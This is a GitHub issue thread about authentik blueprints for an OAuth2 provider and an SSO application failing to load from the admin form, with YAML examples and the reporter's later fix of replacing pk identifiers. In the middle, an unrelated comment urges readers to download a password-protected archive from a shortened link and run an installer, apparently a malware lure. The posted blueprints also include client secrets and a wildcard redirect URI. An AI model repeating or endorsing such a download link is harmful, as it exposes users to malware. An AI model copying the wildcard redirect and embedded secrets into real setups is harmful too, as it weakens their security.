### ISSUE TITLE
Cannot add application or provider blueprint from Customizations/Blueprints form

### ISSUE THREAD

**Issue by PGimenez** [goauthentik/authentik#11088]
**Describe the bug**
Cannot add application or provider blueprint from Customizations/Blueprints form
**To Reproduce**
I exported the blueprint from a previous install and tried to add it back after installing. When I enter the Internal blueprint and click create, nothing happens, the button does nothing and it is not saved. I've also tried with a configmap and it is not loaded either.
Moreover, I've tried removing fields pointing to a UUID like `authentication_flow` just in case, but still doesn't work.

Here's the example blueprint I'm trying to load.

```yaml
version: 1
entries:
  - attrs:
      access_code_validity: minutes=1
      access_token_validity: minutes=5
      authentication_flow: 8609053d-dea2-4f58-8039-09ab5cd9b12b
      authorization_flow: 67a763b8-df92-4626-965e-a519442dec9e
      client_id: KyfPQMtdZDtsVxoygR8r
      client_secret: mY5FbGZp3bvWqIFssd5sf97AVd75byTyHrmcWzHr
      client_type: confidential
      include_claims_in_id_token: true
      issuer_mode: per_provider
      name: sso
      property_mappings:
      - 4c9b5762-71c9-4b46-bbfa-34f99a8f7760
      - b758d890-5c19-4e98-9133-91eb7b9b61f3
      - f3ed3ecd-0399-4887-b092-9366c2527fff
      redirect_uris: '*'
      refresh_token_validity: days=30
      signing_key: 7f26fdf3-9c2f-47e1-a2d1-2278a9013f84
      sub_mode: hashed_user_id
    conditions: []
    id: ""
    identifiers:
      pk: 1
    model: authentik_providers_oauth2.oauth2provider
    state: present
  - attrs:
      name: sso
      policy_engine_mode: any
      provider: 1
      slug: sso
    conditions: []
    identifiers:
      pk: d4427567-8d10-4441-9315-04ffacdca476
    model: authentik_core.application
    state: present
```

**Expected behavior**
I expect the blueprint to appear in the blueprint list. For instance, adding one for a new user works

```yaml
version: 1
metadata: 
  name: "New user"
entries:
  - attrs:
      attributes: {}
      email: gimz@gmail.comzz
      is_active: true
      name: "Pere "
      path: users
      type: internal
      username: pgimz
    conditions: []
    id: user-pgimz
    identifiers:
      pk: 4
    model: authentik_core.user
    state: created
```    
    
**Screenshots**

![CleanShot 2024-08-27 at 18 33 20](https://github.com/user-attachments/assets/0e85b187-11b9-4df8-bfcb-77a86fadf4a1)

**Logs**

The logs show nothing relevant to the issue

**Version and Deployment (please complete the following information):**

-   authentik version: [e.g. [2024.6.4](https://goauthentik.io/docs/releases/2024.6)]
-   Deployment: [helm]

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by PGimenez** [comment]
I finally got it working, it appears the identifiers.pk field was the culprit. here's the entire blueprint

```yaml
context: {}
version: 1
metadata:
  name: SSO - provider
entries:
- attrs:
    access_code_validity: minutes=1
    access_token_validity: minutes=5
    authentication_flow: !Find [authentik_flows.flow, [slug, default-authentication-flow]]
    authorization_flow: !Find [authentik_flows.flow, [slug, default-provider-authorization-explicit-consent]]
    client_id: lV5bGjyUj4sW1LflPGhb
    client_secret: oojhGYxToEUelH7TU26nvj6LjgTZ1ExR3tiCscw8
    client_type: confidential
    include_claims_in_id_token: true
    issuer_mode: per_provider
    redirect_uris: '*'
    name: storage
    refresh_token_validity: days=30
    signing_key: !Find [authentik_crypto.certificatekeypair, [name, authentik Self-signed Certificate]]
    sub_mode: hashed_user_id
  id: sso-provider
  identifiers:
    name: sso-provider
  model: authentik_providers_oauth2.oauth2provider
  state: present
- attrs:
    name: SSO
    policy_engine_mode: any
    provider: !KeyOf sso-provider
    slug: sso
  conditions: []
  identifiers:
    slug: sso
  model: authentik_core.application
  state: present
```
